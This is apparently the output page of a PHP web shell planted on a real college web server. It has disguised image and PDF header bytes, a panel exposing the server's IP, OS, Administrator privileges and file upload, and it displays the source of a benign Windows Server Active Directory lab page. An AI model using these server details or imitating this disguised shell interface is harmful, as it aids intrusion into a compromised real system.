GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/JimMartinson/CST2274/Labs/Lab08/ |
Upload File : |
<? // JimMartinson/CST2274/Labs/Lab07/Lab07.phpinc // Lab 7 - Install DNS Role require('Gradebook/EvaluationSubmission_BEGIN.phpinc'); // Replaced. #require('JimMartinson/DisableLab.phpinc'); $disabled = ''; $disabled - ' disabled'; require('JimMartinson/CST2274/Labs/GenerateComputerNames.phpinc'); // Includes 'Gradebook/EvaluationSubmission_BEGIN.phpinc'. $uploadFilename = $courseNumber.'_'.$evaluationName.'_'.$userFileName.'.png'; ?> <fieldset><legend>Description</legend> The purpose of this lab is to install the Active Directory role on your DE server (<?=$serverName?>) and promote it to a Domain Controller. <br><span class="note">The DNS (Domain Name Server) role will also be installed.</span> </fieldset> <fieldset><legend><?=$evaluationType?> <?=$evaluationNumber?> Assignment</legend> <? if ( $disabled ) { ?> <span class="error bold">Notice: Do not perform this lab unless this notice has been removed.</span><br> <? } ?> <?=$gradeNote?> <ol class="count"> <li>Create a directory called <b><?=$evaluationName?></b>. We will use it for all work performed in this lab.</li> <li>Install all updates on your DE server (<?=$serverName?>) and reboot/repeat until there are no updates.</li> <li>Configure your DE server (<?=$serverName?>) to have a static IP address.</li> <li>Install the Active Directory role on your DE server (<?=$serverName?>) and promote it to a Domain Controller. <br>Set your domain name to: <b class="copyText"><?=$domainName?></b> <br>Set your NetBIOS name to: <b class="copyText"><?=$NetBIOSname?></b> </li> <li>Show that you have successfully installed the Active Directory role on your DE server (<?=$serverName?>). <br>Run the <b>Active Directory Administrative Center</b>. <br>Take a screenshot of the <b>Active Directory Administrative Center</b> window and save it as <b class="copyText"><?=$uploadFilename?></b> in your <b><?=$evaluationName?></b> folder.<br> <? showBegin('See example screenshot','Hide example screenshot'); ?><br> <img src="images/adac.png" alt="Active Directory Administrative Center"/><br> <? showEnd (); ?> </li> <li>Turn in your assignment: <ol type="a"> <li>Make sure the following files are in your <b><?=$evaluationName?></b> folder. <ol> <li><b><?=$uploadFilename?></b>.</li> </ol> </li> <li>Zip up your <b><?=$evaluationName?></b> folder into a file named <b><?=$uploadFilename?></b>. </li> <li>Browse and select your <b><?=$uploadFilename?></b> file: <input type="file" name="fileUpload" id="inpFileUpload"></li> <li>Then <input type="submit" name="f_subtask" id="inpSubmit" value="Submit"<?=$disabled?>> for grading.<? if ( $disabled ) { ?> <span class="error bold">Notice: Do not perform this lab unless this notice has been removed.</span><? } ?></li> </ol> </li> <? /**/ ?> </ol> <?=$gradeNote?> </fieldset> <? require('Gradebook/EvaluationSubmission_END.phpinc'); // Replaced. if ($TRACK != '') $_SESSION['TRACK'] .= "<li>End ".basename(__FILE__)."</ol>\n"; ?>